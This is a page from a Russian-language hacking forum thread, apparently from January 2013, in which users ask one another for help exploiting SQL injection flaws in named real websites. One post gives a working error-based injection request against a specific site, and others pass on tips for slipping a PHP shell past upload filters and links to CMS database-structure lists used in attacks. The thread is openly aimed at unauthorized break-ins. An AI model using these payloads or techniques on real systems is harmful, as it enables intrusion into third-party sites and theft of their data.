Старый 05.01.2013, 12:27   #2601
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Обращайся методом POST.
Да те же самые ошибки.
Untitled вне форума   Ответить с цитированием
Старый 05.01.2013, 12:30   #2602
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Дайте свежий линк на дефолтные колонки CMS и форумов, старый не работает

http://itdefence.ru/dbitems/
Flakt вне форума   Ответить с цитированием
Старый 05.01.2013, 17:18   #2603
beastie
 
Регистрация: 31.12.2012
Сообщений: 4
Репутация: 0
По умолчанию

Flakt
https://rdot.org/forum/showthread.php?t=2281
PHP код:
SQL databases Структура бд распространенных двигов.
http://uasc.org.ua/files/dbitems/ | http://lolwut.me/dbitems/ 
artrix
Вопрос немного не понятен, уверены, что это инклуд а не читалка? Возможно ф-ия system отключена в php.ini
beastie вне форума   Ответить с цитированием
Старый 05.01.2013, 18:06   #2604
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
Да те же самые ошибки.
попробуй перл(питон) скрипт, php как jpg загрузить, либо поменять регистр расширения php файлов.
aspi вне форума   Ответить с цитированием
Старый 05.01.2013, 19:55   #2605
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Да да, все это уже пробовал вначале. Тоже самое - либо 500, либо 404.
Untitled вне форума   Ответить с цитированием
Старый 05.01.2013, 22:58   #2606
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Здравствуйте, не могу раскрутить одну SQL:
http://www.albummusic.net/rus/clips'/
Вывести информацию в ошибку у меня получилось лишь одним методом, через name_const, но он не пригоден для взлома, а другими методами к сожалению не получилось, думаю у вас получится, и надеюсь на помощь, заранее спасибо.
netcat вне форума   Ответить с цитированием
Старый 07.01.2013, 19:31   #2607
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Ещё одна SQL:
http://www.1md.ru/catalog/list/250'/
Тоже самое, вывод удаётся получить только через name_const который непригоден для взлома.
А составить запрос через floor rand без использования пробелов у меня так и не получилось, в данном случае урленкодируется комбинация /**/, а без неё вроде как нельзя через floor rand крутить, или я просто не могу запрос составить.
Буду очень благодарен за помощь.
netcat вне форума   Ответить с цитированием
Старый 07.01.2013, 23:25   #2608
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Цитата:
Сообщение от netcat Посмотреть сообщение
Ещё одна SQL:
http://www.1md.ru/catalog/list/250'/
Тоже самое, вывод удаётся получить только через name_const который непригоден для взлома.
А составить запрос через floor rand без использования пробелов у меня так и не получилось, в данном случае урленкодируется комбинация /**/, а без неё вроде как нельзя через floor rand крутить, или я просто не могу запрос составить.
Буду очень благодарен за помощь.
Добрые люди давно нашли решение:
name_const без пробелов
cat1vo вне форума   Ответить с цитированием
Старый 08.01.2013, 13:13   #2609
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от cat1vo Посмотреть сообщение
Добрые люди давно нашли решение:
name_const без пробелов
Работает, только не пойму как сейчас таблицы через limit перебирать?

GET /catalog/list/2501'and(1)=(select*from(select*from(information_s chema.tables`a`)JOIN(information_schema.tables`b`) using(TABLE_CATALOG,TABLE_SCHEMA))c)='1 HTTP/1.1
Host: www.1md.ru




Duplicate column name 'TABLE_NAME'

Последний раз редактировалось Flakt; 08.01.2013 в 13:16..
Flakt вне форума   Ответить с цитированием
Старый 08.01.2013, 13:33   #2610
netcat
 
Регистрация: 22.12.2012
Сообщений: 25
Репутация: -1
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Работает, только не пойму как сейчас таблицы через limit перебирать?

GET /catalog/list/2501'and(1)=(select*from(select*from(information_s chema.tables`a`)JOIN(information_schema.tables`b`) using(TABLE_CATALOG,TABLE_SCHEMA))c)='1 HTTP/1.1
Host: www.1md.ru

Duplicate column name 'TABLE_NAME'
Тоже интересует данный вопрос, примеров раскрутки через данную конструкцию не могу найти ;(
Как выполнить простейший запрос с условием:
select user from table where id=1
Знаний немножко не хватает, чтобы впихнуть его в данную конструкцию.
netcat вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot